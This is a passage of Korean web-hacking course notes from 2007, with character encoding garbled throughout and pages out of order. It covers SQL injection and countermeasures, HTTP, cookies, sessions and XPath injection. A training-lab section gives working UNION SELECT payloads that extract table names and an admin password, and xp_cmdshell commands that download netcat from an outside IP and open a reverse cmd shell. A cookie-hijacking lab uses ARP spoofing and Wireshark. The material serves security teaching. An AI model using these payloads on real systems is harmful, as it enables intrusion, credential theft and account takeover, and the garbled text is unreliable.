๊ฐ€์šฉ์„ฑ์„ ๋–จ์–ดํŠธ๋ฆฌ๋Š” ๊ณต๊ฒฉ์ œ์™ธ

์„œ๋ฒ„์˜ shellํš๋“ or๊ด€๋ฆฌ์ž ์•”ํ˜ธ ํš๋“

๋ฐ์ดํ„ฐ ์—ด๋žŒ ํ—ˆ์šฉ๊ธˆ์ง€

Ethical Hacking์ธ ๊ฒฝ์šฐ ๊ณ ๊ฐ์˜ ์š”๊ตฌ์‚ฌํ•ญ ๋ฐ˜์˜

์˜คํƒ์ œ๊ฑฐ

์›น ์ทจ์•ฝ์  ์Šค์บ๋„ˆ ๊ฒฐ๊ณผ ๋ถ„์„

ONE WAY WEB HACKING ์ฝ์–ด๋ณด๊ธฐ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 14

SQL INJECTION

GETPOST ํŒŒ๋ผ๋ฏธํ„ฐ HTTP REQUEST ํŒŒ๋ผ๋ฏธํ„ฐ ์ฟ ํ‚ค ๊ฐ’

๊ธฐํƒ€ ์„œ๋ฒ„์—์„œ ์ฒ˜๋ฆฌํ•˜๋Š” ๋ชจ๋“ž ํด๋ผ์ด์–ถํŠธ ๊ฐ’

ํด๋ผ์ด์–ถํŠธ ์ž…๋ ฅ ๊ฐ’ ์œ ํ˜•

ํด๋ผ์ด์–ถํŠธ์—์„œ ์ž…๋ ฅ๋œ ๊ฐ’์ด ์œ ํšจ์„ฑ ๊ฒ€์ฆ๊ณผ์ • ์—†์ด sql ๋ฌธ์— ํฌํ•จ๋˜๋Š” ๊ฒฝ์šฐ

MAIN CAUSE

Impact

์ธ์ฆ์šฐํšŒ

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ๋คํ”„ ์กฐ์ž‘ ์ƒ์„ฑ ํŒŒ๊ดด

DML D์ด ๋“ฑ ์ƒ์ƒํ•› ์ˆ˜ ์žˆ๋Š” ๋ชจ๋“ž ์ž‘์—…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ปจํŠธ๋กค

์‹œ์Šคํ…œ ๋ช…๋ น์–ด ์‹คํ–‰

COUNTERMEASURE

์ž…๋ ฅ๊ฐ’ ๊ฒ€์ฆ

์ตœ์†Œ๊ถŒํ•š ๋ถ€์—ฌ(SYSTEMDBMSDatabase)

์ธ์ฆ์šฐํšŒ

์ธ๊ฐ€๋œ ์‚ฌ์šฉ์ž์˜ ID PW ๋ฅผ ์ž…๋ ฅํ•˜์ง€ ์•Š๊ณ ๋„ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ํ–‰์œ„

ID PW๋ฅผ ๋ชจ๋ฅด๋Š” ์ƒํƒœ์—์„œ๋„ ์ ์ ƒํžˆ ๊ตฌ์„ฑ๋œ ๋ฌธ์ž์—ด์„ ์ž…๋ ฅํ•˜์—ฌ ์ธ์ฆ์„ ์šฐํšŒํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

์ž…๋ ฅ๋œ ๋ฌธ์ž์—ด์€ SQL ๋ฌธ์˜ ์ผ๋ถ€๋กœ ์‚ฝ์ž…์ด ๋˜์–ด ์‹คํ–‰๋จ

์ธ์ฆ ์šฐํšŒ์— ์‚ฌ์šฉ๋˜๋Š” ์ž…๋ ฅ๊ฐ’์€

๋ฌธ๋ฒ•์ƒ ์˜ค๋ฅ˜๋ฅผ ์‹œํ‚ค์ง€ ์•Š์•„์•ผ ํ•จ

WHERE์ ƒ์˜ ์กฐ๊ฑด์ด ํ•ญ์ƒ ์ฐธ์ด ๋˜๋„๋ก ์กฐ์ž‘

์›น ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ์ผ๋ฐ˜์ ์ธ ์ธ์ฆ ์ ƒ์ฐจ

1IDPW ์ž…๋ ฅ

2SQL Query ์ƒ์„ฑ

3DATABASE์— ์ฟผ๋ฆฌ ์ ‚์†ก

4DATABASE์—์„œ ์ฟผ๋ฆฌ๋ฌธ ์‹คํ–‰

5๋ฐ˜ํ™˜๋˜๋Š” RETURN๊ฐ’์— ๋”ฐ๋ผ ์ธ์ฆ์—ฌ๋ถ€ํŒ๋‹จ

SQL INJECTION ์ ƒ์ฐจ

DB ์Šคํ‚ค๋งˆํŒŒ์•… (DBTABLECOLUMN ํ™˜๊ฒฝ์ •๋ณด๋“ฑ ํŒŒ์•…

๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์ด๋ฆ„ ํŒŒ์•…

ํ…Œ์ด๋ธ”์ด๋ฆ„ ํŒŒ์•…

์ปฌ๋Ÿผ์ด๋ฆ„ ํŒŒ์•…

๋ชจ๋“ž SQL INJECTION์€ ์ž…๋ ฅ๊ฐ’์— ๋Œ€ํ•š ์œ ํšจ์„ฑ ๊ฒ€์ฆ์„ ํ•˜์ง€ ์•Š๊ธฐ ๋•Œ๋ฌธ์— ๋ฐœ์ƒํ•š๋‹ค ์—๋Ÿฌ๋ฅผ ์œ ๋„ํ•˜์—ฌ ํ•„๋“œ์˜ ์ •๋ณด๋ฅผ ๋ˆ„์ถœ์‹œํ‚จ๋‹ค

DBMS ๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ๋ ˆ์ง€์ŠคํŠธ๋ฆฌ์— ์ ‘๊ทบํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅ

DBMS๊ฐ€ ์ ์ ƒํ•š ๊ถŒํ•š์„ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ ์ฟผ๋ฆฌ๋ฅผ ํ†ตํ•š ์„œ๋น„์Šค ์ œ์–ด๊ฐ€ ๊ฐ€๋Šฅ

OYES MALL (SQL INJECTION์„ ์ด์šฉํ•š ๊ด€๋ฆฌ์ž ๊ถŒํ•š ํš๋“ ์‹ค์Šต

ํ™˜๊ฒฝ์€(2000ASPMS-SQL2000)

์ค€๋น„๋œ ์‡ผํ•‘๋ชฐ์ด๋‹ค

์ฒซ๋ฒˆ์งธ ๋ฐฉ๋ฒ•

Web Hacking 3์ผ์ฐจ

2007๋…„ 10์›” 25์ผ ๋ชฉ์š”์ผ

์˜ค์ ‚ 1200

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 15

group by(user_id) -- ๋ฅผ ์ด์šฉํ•ด ํ…Œ์ด๋ธ”์„ ์•Œ์•„๋‚ธ๋‹ค

Member ํ…Œ์ด๋ธ”์•†์—์žˆ๋Š” num์ด๋ผ๋Š” ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋ƒˆ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 16

union select from members where user_id like o ํ•ด๋ด๋ผ ๋กœ๊ทธ์ธ ๋ ๊ฑฐ๋‹ค

๋‘๋ฒˆ์งธ ๋ฐฉ๋ฒ•

์ฃผ์†Œ๋ก์กฐํšŒ ๋ถ€๋ถ„์— SQL INJECTION์„ ํ•˜์˜€๋‹ค

$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์™€๊ฐ™์ด ์งˆ์˜๋ฅผ ํ•˜๋ฉด ํ† ํ•ด๋‚ธ๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 17

์šฐ๋ฆฌ๋Š” members ๋ผ๋Š” ํ…Œ์ด๋ธ”์ด ์กด์žฌํ•˜๋Š” ๊ฒƒ์„ ๋ณผ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค

$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --

Members์— ๋Œ€ํ•š ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋‚ธ๋‹ค

$ or 1=(select top 1 user_id from members)--

User id์˜ ์ปฌ๋Ÿผ์— top 1 ์ธ๊ฒƒ์„ ํ† ํ•ด๋‚ธ๋‹ค

union select 1234 user_idpasswd from members where user_id=oyes --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 18

์œผ์•„~password ๊ฐ€ oyesmall ์ด๋ผ๋„ค ์‹ค์Šต ๋

File Uploading

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --

$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --

์•„์ฃผ ๊ฐ„๋‹จํ•˜๋‹ค

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 19

QUERY_STRING REMOTE_ADDR

SERVER_PORT HTTP_USER_AGENT

REQUEST_METHOD

CONTENT_TYPE

CONTENT_LENGTH

HTTP

HTTP(HYPERTEXT TRANSFER PROTOCOL)

-TCP ๊ธฐ๋ฐ˜์˜ ํ”„๋กœํ† ์ฝœ

-REQUEST ์™€ RESPONSE์˜ ๊ตฌ์กฐ๋กœ ๋˜์–ด ์žˆ์Œ

-STATELESS ํ•š ํ”„๋กœํ† ์ฝœ(REQUEST ์™€ RESPONSE๊ฐ€ ์ด๋ฃจ์–ด์ง€๋ฉด ์ ‘์†์ด ์ข…๋ฃŒ๋จ (HTTP10)

๊ธฐ๋ณธ์šฉ์–ด

URI (Uniform Resource Idenifier)

-์ธํ„ฐ๋„ท ์ƒ์˜ ์ž์›์„ ์‹๋ณ„ํ•˜๊ธฐ ์œ„ํ•š ๋ฌธ์ž์—ด

URL(Uniform Resource Locator)

-์ž์›์˜ ์œ„์น˜ ์ •๋ณด๊ฐ€ ์ค‘์š”

-httpwwwsitecomsearchasp

URL(Uniform Resource Name)

-์ž์›์˜ ์œ„์น˜์™€ ์ƒ๊ด€์—†์ด ์ž์ฒด์˜ ์ •๋ณด๊ฐ€ ์ค‘์š”ํ•˜๋‹ค

-urnisbn021702452

HTTP ํ”„๋กœํ† ์ฝœ ํ†ต์‹ž ๋ฐฉ์‹

HTTPResposeHeader

HTTPRequestHeader

HTTP 10

ํ•˜๋‚˜์˜ ๋ฌธ์„œ์— ๊ทธ๋ฆผ์ด ํ•˜๋‚˜ ์žˆ๋”๋ผ๋„ ์ตœ์ดˆ ํ…์ŠคํŠธ๊ฐ€ ์ €์žฅ๋œ HTTP ๋ฌธ์„œ๋ฅผ ์ ‚์†ก๋ฐ›๊ณ  ๋‚œ ๋’ค ์—ฐ๊ฒฐ์„ ๋Š๊ณ  ๊ทธ๋ฆผ์„

๋ฐ›๊ธฐ ์œ„ํ•ด ๋‹ค์‹œ ์—ฐ๊ฒฐ์„ ์„ค์ •ํ•š ํ›„ ๊ทธ๋ฆผ์„ ์ ‚์†ก๋ฐ›๋Š”๋‹ค

HTTP11

์—ฐ์†๋œ ์—ฐ๊ฒฐ ์š”์ฒญ์ด ์žˆ์„ ๊ฒฝ์šฐ์— HTML ๋ฌธ์„œ๋ฅผ ๋ฐ›๊ณ  ๋‚œ ๋’ค ์—ฐ๊ฒฐ์„ ๋Š๊ณ  ๋‹ค์‹œ ์—ฐ๊ฒฐ์„ ์š”์ฒญํ•˜์ง€ ์•Š๊ณ  ๋ฐ”๋กœ ๊ทธ๋ฆผ ํŒŒ์ผ

์„ ์š”์ฒญํ•š๋‹ค

HTTP 11์˜ Method

Method ์„ค๋ช…

GET ์ž์›์š”์ฒญ

POST ENTITY๋ฅผ ํฌํ•จํ•š ์ž์› ์š”์ฒญ

HEAD HTTP HEADER ์ •๋ณด๋งŒ ์ˆ˜์‹ž

TRACE Request์˜ ๋ฃจํ”„๋ฐฑ ํ…Œ์ŠคํŠธ

PUT URL์— ์ž์›์„ ์ƒ์„ฑ

DELETE URL์˜ ์ž์›์„ ์‚ญ์ œ

OPTIONS ์‘๋‹ต ๊ฐ€๋Šฅํ•š HTTP๋ฉ”์†Œ๋“œ๋ฅผ ์š”์ฒญ

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 3

OPTIONS ์‘๋‹ต ๊ฐ€๋Šฅํ•š HTTP๋ฉ”์†Œ๋“œ๋ฅผ ์š”์ฒญ

CONNECT ํ„ฐ๋„๋ง์˜ ๋ชฉ์ ์œผ๋กœ ์—ฐ๊ฒฐ์š”์ฒญ(Proxy ์—ฐ๊ฒฐ)

GETPOST ๋ฉ”์†Œ๋“œ

GET๊ณผ POST๋Š” ์„œ๋ฒ„์— ์ž์›์„ ์š”์ฒญํ•›๋•Œ ์‚ฌ์šฉ๋จ

GET๋ฐฉ์‹ POST๋ฐฉ์‹

์„œ๋ฒ„์— ์ ‚๋‹ฌํ•˜๊ณ ์žํ•˜๋Š” ๋ฐ์ดํ„ฐ๋ฅผ URL ์— ํฌํ•จ์‹œํ‚ด

์ ‚์†กํ•› ์ˆ˜ ์žˆ๋Š” ๋ฐ์ดํ„ฐ๋Ÿ‰์ด ์ œํ•š๋จ(2K4K)

์„œ๋ฒ„์— ์ ‚๋‹ฌํ•› ๋ฐ์ดํ„ฐ๋ฅผ REQUEST Body์— ํฌํ•จ์‹œํ‚ด

๋ฐ์ดํ„ฐ ์ ‚์†ก๋Ÿ‰์˜ ์ œํ•š์ด ์—†์Œ(์‹œ๊ฐ„์ œํ•š๊ฐœ๋…)

GET loginaspuser_id=adminampuser_pass=1234

HOSTwwwsitecom

POST loginasp HTTP11

HOSTwwwsiteorg

User_id=admin user_pass=1234

get๋ฐฉ์‹(์›น ๋กœ๊ทธ๋Š” 8000์ž ๊นŒ์ง€๋งŒ ์ €์žฅํ•š๋‹ค)

HEAD ๋ฉ”์†Œ๋“œ

TRACE ๋ฉ”์†Œ๋“œ

WEBDAV ๊ด€๋ ฆ๋ฉ”์†Œ๋“œ

PUT

COPY

MOVE

DELETE

MAKECOL

PUT๋ฉ”์†Œ๋“œ ์‚ฌ์šฉ์˜ˆ์ œ

PUT HTTPWWWKISECCOMindex11html HTTP1O

HOSTWWWKISECCOM

Content-Length30

User-AgentBlaBla Client

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 4

User-AgentBlaBla Client

HTTP RESPONSE์˜ ์ฃผ์š” ์‘๋‹ต ์ฝ”๋“œ

์ฃผ์š” ์‘๋‹ต์ฝ”๋“œ

200 OK 400 BadRequest

201 Created 401 Unauthorized

202 Accepted 403 Forbidden

404 Not Found 301 Moved permanently

302 Found 500 Internal Server Error

HTTP ๊ด€๋ ฆ ๊ธฐ์ˆ 

์ฟ ํ‚ค

94๋…„ ๋„ท์Šค์ผ€์ดํ”„์—์„œ ๊ฐœ๋ฐœ

์„œ๋ฒ„๊ฐ€ ์ƒ์„ฑํ•˜๊ณ  ํด๋ผ์ด์–ถํŠธ์— ์ €์žฅ์‹œํ‚ค๋Š” ๋ฐฉ์‹

์ €์žฅ์˜๊ตฌ์ (Persistent๋””์Šคํฌ)๋ฐ˜์˜๊ตฌ์ (Non-Persistent ๋ฉ”๋ชจ๋ฆฌ)

๋ณด์•†๋ณด์•†๋น„๋ณด์•†

์ œํ•šํฌ๊ธฐ์ œํ•š(4k)๋ณ€์ˆ˜์ œํ•š(2k)

ํ•š๋ฒˆ ์ €์žฅ๋œ ์ฟ ํ‚ค๋Š” ์ฟ ํ‚ค์˜ ์œ ํšจ๊ธฐ๊ฐ„์ด ์ง€๋‚˜์ง€ ์•Š๋Š” ํ•š ํ•ด๋‹น ๋„๋ฉ”์ธ์— ์ ‘์†์‹œ ๋ธŒ๋ผ์šฐ์ €๊ฐ€ ์ž๋™์œผ๋กœ ํƒ‘์žฌํ•˜์—ฌ ์ ‚์†ก

ํ•˜๊ฒŒ ๋จ

์ฟ ํ‚คํŒŒ์ผํ˜•ํƒœ์‚ฌ์šฉ์ž์ด๋ฆ„์ ‘์†ํ•š์‚ฌ์ดํŠธ

์ฟ ํ‚คํŒŒ์ผ๋‚ด์šฉ๊ฐœ๋ฐœ์ž๊ฐ€ ์„ค์ •ํ•˜๊ธฐ ๋‚˜๋ฆ„

๋””ํดํŠธ ๋””๋ ‰ํ† ๋ฆฌ CDocuments and Setting์‚ฌ์šฉ์ž์ด๋ฆ„Cookies

๊ธฐ๋ณธํฌ๋งท

Set-cookie

Name=value ์ฟ ํ‚ค์˜ ์ด๋ฆ„

Expire=date ์ฟ ํ‚ค์˜ ์œ ํšจ๊ธฐ๊ฐ„

Domain=domain ๋„๋ฉ”์ธ

Path=path ์ฟ ํ‚ค๋ฅผ ์ด์šฉํ•˜์—ฌ ์ ‘์†์‚ฌ๋Šฅํ•š URL

Secure ๋ณด์•†๋น„๋ณด์•†์„ค์ •

๊ด€๋ ฆ ISSUE

์‚ฌ์šฉ์ž ์ž„์˜์กฐ์ž‘ ๋ฐ ์Šค๋‹ˆํ•‘ ํ”„๋ก์‹œ ๋“ฑ์„ ํ†ตํ•š ๋ณ€์กฐ๊ฐ€๋Šฅ

XSS๋“ฑ์„ ํ†ตํ•š ํƒ€์ธ์˜ ์ฟ ํ‚คํƒˆ์ทจ

์žฌ์ƒ๊ณต๊ฒฉ์— ๋ฌด๋ฐฉ๋น„

๋Œ€์‘๋ฐฉ์•† ์ฟ ํ‚ค๋Š” ์‚ฌ์šฉํ•˜์ง€ ์•Š๋Š”๋‹ค๋Š” ๊ธฐ๋ณธ ์ฒ ์น™ ์‚ฌ์šฉํ•› ๊ฒฝ์šฐ ๊ฒ€์ฆ๋œ ์•”ํ˜ธํ™” ์•Œ๊ณ ๋ฆฌ์ฆ˜์œผ๋กœ ์ตœ์†Œํ•š์˜ ์ •๋ณด๋งŒ

์ €์žฅ ์ฟ ํ‚ค์˜ ๋ฌด๊ฒฝ์„ค ๊ฒ€์‚ฌ๋ฅผ ์œ„ํ•ด ์ ‚์†ก๋˜๋Š”(ํŠน์ • ๋ณ€์ˆ˜ ๊ฐ’+TimeStamp)๋“ฑ์˜ ์ •๋ณด๋ฅผ ํ•ด์‹œํ•š ๊ฐ’๊นŒ์ง€ ๊ฐ™์ด

์ ‚์†ก ์™„๋ฒฝํ•˜์ง‚ ์•Š์œผ๋‚˜ ์„ธ์…˜๊ณผ ๊ฐ™์ด ๋ณ‘ํ–‰์‹œ ๋ณด์•†์„ฑ ํ–ฅ์ƒ

์„ธ์…˜(SESSION)

HTTP์ ‘์† ์„ธ์…˜์— ๋Œ€ํ•š ์ฒ˜๋ฆฌ๋ฅผ ๋‹ด๋‹นํ•˜๋Š” ๊ธฐ์ˆ 

Server Side ๊ธฐ์ˆ ๋กœ HTTP์˜ Stateless ํ•š ํŠน์„ฑ์„ ๋ณด์™„ํ•˜๊ธฐ ์œ„ํ•ด Uniq ํ•š ID๋ฅผ ์ƒ์„ฑํ•˜์—ฌ ํ˜„์žฌ ์ ‘์†ํ•š ํด๋ผ์ด์–ถํŠธ์—๊ฒŒ

ํ•›๋‹นํ•ด์ฃผ๊ณ  ๊ธฐ์–ตํ•˜๋Š” ๋ฐฉ์‹

๊ณผ๊ฑฐ cookie์— ์ €์žฅํ•˜๋˜ ๋ณ€์ˆ˜ ๊ฐ’ ์„ ์ดˆ๊ธฐ ์ ‘์† ์‹œ ํ•›๋‹นํ•˜๊ฒŒ ๋จ

ํ•›๋‹นํ•š ๋ณ€์ˆ˜๋Š” ์„œ๋ฒ„์— ์ €์žฅ๋˜๋ฉฐ ํด๋ผ์ด์–ถํŠธ ์ธก ์—๋Š” ์„ธ์…˜ ID๋งŒ ๋ถ€์—ฌ๋จ

์ฃผ๋กœ Web Application Server ๋‚˜ Web Server ๋ฅผ ํ•›๋‹น ๋ฐ›์œผ๋ฉฐ ์ด๋•Œ ํ•ด๋‹น ID์— ํŠน์ • ์ •๋ณด๋ฅผ ์ €์žฅํ•› ์ˆ˜ ์žˆ์Œ

ํด๋ผ์ด์–ถํŠธ๋Š” ์„œ๋ฒ„์™€ ํ†ต์‹ž์‹œ SESSION ID๋งŒ ์ฃผ๊ณ  ๋ฐ›์Œ

์„ธ์…˜ID

WASWS ์„ธ์…˜ ID๋ณ€์ˆ˜

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 5

IIS ASPSESSIONID

APACHE SESSIONID

TOMCAT JSESSIONID

PHP PHPSESSID

๊ธฐํƒ€ JServerSessionID

JWSESSIONID

SESSID

SESSION

SID

SESSION_ID

์„ธ์…˜

WASWS ๋งˆ๋‹ค ๋‹ค๋ฅด์ง€๋งŒ ๋ณดํ†ต 10๋ถ„20๋ถ„ ์„ค์ •์ž„

์‚ฌ์šฉ์ž๊ฐ€ ๋น„์ •์ƒ ๋กœ๊ทธ์•„์›ƒ ํ•˜๊ฑฐ๋‚˜ Request ์š”์ฒญ ์—†์„ ์‹œ ์œ„ ํƒ€์ž„ ์•„์›ƒ ๊ฐ’ ์ดˆ๊ณผ ํ›„ ํ•ด๋‹น ์„ธ์…˜ID๋Š” ์†Œ๋ฉธ

์„ธ์…˜๋„ ์ฟ ํ‚ค์™€ ๊ฐ™์€ ์œ ํšจ๊ธฐ๊ฐ„ ์žˆ์Œ

๊ด€๋ ฆ ISSUE

์ดˆ๊ธฐ์„ธ์…˜๊ฐ์ฒด ์ƒ์„ฑ์‹œ ํด๋ผ์ด์–ถํŠธ์˜ IP ๋ฉ”์ธ๋ณด๋“œSN ํ•˜๋“œ๋””์Šคํฌ SN๋“ฑ Uniq ํ•š ๊ฐ’์„ ์„ค์ •ํ•š ํ›„ ๋งค ํŽ˜์ด์ง€๋งˆ๋‹ค

์ธ์ฆ๋น„๊ต๋ฅผ ํ†ตํ•ด ๊ณต๊ฒฉ์„ ์˜ˆ๋ฐฉํ•› ์ˆ˜ ์žˆ์Œ

์‚ฌ์šฉ์ž ์ž„์˜์กฐ์ž‘์„ ํ†ตํ•š ๊ณต๊ฒฉ์‹œ๋„

์„ธ์…˜ ์ดˆ๊ธฐ ์ƒ์„ฑ์‹œ๋งˆ๋‹ค ์ƒˆ๋กœ์šด ID๋ฅผ ์ƒ์„ฑ

์žฌ์ƒ๊ณต๊ฒฉ

์‹ค์Šต

Cookie๊ฐ’์„ ์Šค๋‹ˆํ•‘ ํ•ด์„œ ์ƒ๋Œ€๋ฐฉ Cookie๊ฐ’์œผ๋กœ ์ƒ๋Œ€๋ฐฉ ๊ณ„์ •์œผ๋กœ ๋กœ๊ทธ์ธ

์‹ค์Šตํ™˜๊ฒฝWinArpSpoof or CainampAbel or wireshark

Wireshark๋กœ arp ์Šคํ‘ธํ•‘์„ ํ•ด์„œ ํŒจํ‚ท์ด ๋‚˜์—๊ฒŒ ๋„˜๊ฒจ์˜ค๊ฒŒ ๋งŒ๋“ž๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 6

ํ™”๋ฉด๊ณผ ๊ฐ™์ด wireshark๋ฅผ ์ค€๋น„ํ•š๋‹ค

์Šคํ‘ธํ•‘์„ ํ•˜๊ณ  ์žˆ์œผ๋ฉด ์ƒ๋Œ€๋ฐฉ ์ธก์—์„œ wwwnavercom ์— ๋กœ๊ทธ์ธ์„ ํ•˜๊ฒŒ ๋˜๋ฉด ํŒจํ‚ท์ด ๋‚ ๋ผ ์˜ค๊ฒŒ ๋œ๋‹ค ์—ฌ๊ธฐ์„œ ์šฐ๋ฆฌ๋Š”

๋กœ๊ทธ์ธ ๊ด€๋ ฆ ํŒจํ‚ท ๋งŒ ์•Œ์•„๋ณด๊ธฐ ์œ„ํ•ด ํ•„ํ„ฐ์— httprequestmethod == POST ๋ฅผ ์นš๋‹ค

๋‹ค์Œ๊ณผ ๊ฐ™์ด ๋‚˜์˜ฌ ๊ฒƒ์ด๋‹ค Set-Cookie๋ถ€๋ถ„์„ ๋ณต์‚ฌํ•ด ๋‘”๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 7

๋‹ค์Œ๊ณผ ๊ฐ™์ด ์„ค์ •์„ ์กฐ๊ธˆ ๋ณ€๊ฒฝ ์‹œ์ผœ์ค€๋‹ค

๋‹ค์Œ๊ณผ ๊ฐ™์ด ์…‹ํŒ…์„ ํ•ด๋‘”๋‹ค

๊ทธ๋Ÿผ ๋‹ค์Œ๊ณผ ๊ฐ™์ด ๋กœ๊ทธ์ธ์ด ๋˜๋Š” ์žฅ๋ฉด์„ ๋ณผ ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค

์—ฌ๊ธฐ์„œ๋Š” XSS๋ฅผ ์‚ฌ์šฉํ•˜์ง€ ์•Š๊ณ  Network์ƒ์—์„œ Cookie๊ฐ’์„ ํ›”์ณ์„œ ๊ณ„์ •์„ ํ›”์ณ ๋ณด์•˜๋‹ค

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 8

XML ํŠน์ง•

๋ฌธ์„œ์˜ ๋‚ด์šฉ๊ณผ ๋””์ž์ธ์ด ์™„์ ‚ํžˆ ๋ถ„๋ฆฌ

๋ฌธ์„œ๊ตฌ์กฐ๋Š” XML๋กœ ํ”„๋ฆฌ์ žํ…Œ์ด์…˜์€ XSL์„ ํ†ตํ•ด

๋‹ค์–‘ํ•š ๋ฐฉ์‹์˜ ๋งํฌ ๊ธฐ๋Šฅ ์ œ๊ณต

ํ‘œ์ค€ํ™”๋œ DTD์„ ํ†ตํ•ด ๋ชจ๋“ž ๋ถ„์•ผ์— ์‚ฌ์šฉ๊ฐ€๋Šฅ

DOM(Document Object Model)

SAX(Simple API for XML)

XML๊ตฌ์กฐ2๊ฐ€์ง€ ๋Œ€ํ‘œ์  ๋ชจ๋ธ์กด์žฌ

๊ตฌ์„ฑ์š”์†Œ ์„ค๋ช…

์—˜๋ฆฌ๋จผํŠธ ๋งˆํฌ์—… ํƒœ๊ทธ์™€ ๊ทธ ์•†์— ํฌํ•จ๋œ ๋‚ด์šฉ

๋นˆ ์—˜๋ฆฌ๋จผํŠธ ๋‚ด์šฉ์„ ํฌํ•จํ•˜์ง€ ์•Š๋Š” ๋นˆ ์—˜๋ฆฌ๋จผํŠธ

๋ฃจํŠธ ์—˜๋ฆฌ๋จผํŠธ ๋ฌธ์„œ๋‚ด ๋ชจ๋“ž ์—˜๋ฆฌ๋จผํŠธ์™€ ๋‚ด์šฉ์„ ํฌํ•จํ•˜๊ณ  ์žˆ๋Š” XML ๋ฌธ์„œ์˜ ์—˜๋ฆฌ๋จผํŠธ

์†์„ฑ ์—˜๋ฆฌ๋จผํŠธ์— ํฌํ•จ๋˜์–ด ์ถ”๊ฐ€์ ์ธ ์ •๋ณด๋ฅผ ์ œ๊ณต

ltimg src=balbalbalgtbalbalballtimggt

์—”ํ‹ฐํ‹ฐ ํ…์ŠคํŠธ ๋ฐ”์ด๋„ˆ๋ฆฌ๋ฐ์ดํ„ฐ ๋น„ ์•„์Šคํฌ ๋ฌธ์ž๋ฅผ ์ €์žฅํ•˜๋Š”๋ฐ ์‚ฌ์šฉ

์ฒ˜๋ฆฌ๋ช…๋ น ์ ‚์ฒด ๋ฌธ์„œ๋‚˜ ๋ฌธ์„œ์˜ ์ผ๋ถ€๋ฅผ ์ฒ˜๋ฆฌํ•˜๋Š” ์‘์šฉํ”„๋กœ๊ทธ๋žจ๊ณผ ์—ฐ๊ฒฐํ•ด ์ฃผ๋Š” ๋ช…๋ น์–ด lt gt

์ฃผ์„ XML ํ”„๋กœ์„ธ์„œ๊ฐ€ ํ•ด์„ํ•˜์ง€ ์•Š๋Š” ์„ค๋ช…๋ฌธ

lt-- --gt

CDATA์„น์…˜ ํŠน์ˆ˜ํ•š ๋ฌธ์ž๋ฅผ ์ผ๋ฐ˜ ํ…์ŠคํŠธ๋กœ ์ธ์‹ํ•˜๋„๋ก ํ•˜๋Š” ํ‘œ๊ธฐ๋ฒ•

lt[CDATA[hellipstring]]gt

Xpath

Xml ๋ฌธ์„œ์— ๋Œ€ํ•š ์งˆ์˜์–ถ์–ด

SQL๋ฌธ์€ ํŠน์ • ํ…Œ์ด๋ธ”์˜ ํ–‰๊ณผ ์—ด์„ ์„ ํƒ

Xpath๋Š” ํŠน์ • XML๋ฌธ์„œ์˜ ๋…ธ๋“œ์™€ ๋…ธ๋“œ์…‹์„ ์„ ํƒ

๊ด€๋ ฆ Issue

์˜ˆ)bookbook[ISBN=1111 or 1=1]

๋ชจ๋“ž book ๋…ธ๋“œ๋“ค์— ์ ‘๊ทบ๊ฐ€๋Šฅ

Xpath๊ณต๊ฒฉ

๋Œ€ํ˜• ํŽ˜์ด๋กœ๋“œ ๊ณต๊ฒฉ(like DOS)

XML์˜ ๋…ธ๋“œ์™€ ์†์„ฑ์ด ์ค‘์ฒฉ ์„ ์–ถ๋  ์ˆ˜ ์žˆ๋‹ค๋Š” ์ ์„ ์•…์šฉ

ํŠน์ • ๋…ธ๋“œ์•†์— ๋™์ผ ๋…ธ๋“œ๋ช… ๋ฐ˜๋ณต์„ ์–ถ์†์„ฑ ๋ฌดํ•š์„ ์–ถ

์žฌ๊ท€ ํŽ˜์ด๋กœ๋“œ ๊ณต๊ฒฉ

`or loginid(nodeLoginID())=LoginID or a=b

07๋…„ ํ•ดํ‚น๋ฐฉ์–ด๋Œ€ํšŒ๋ฌธ์ œ

WebService

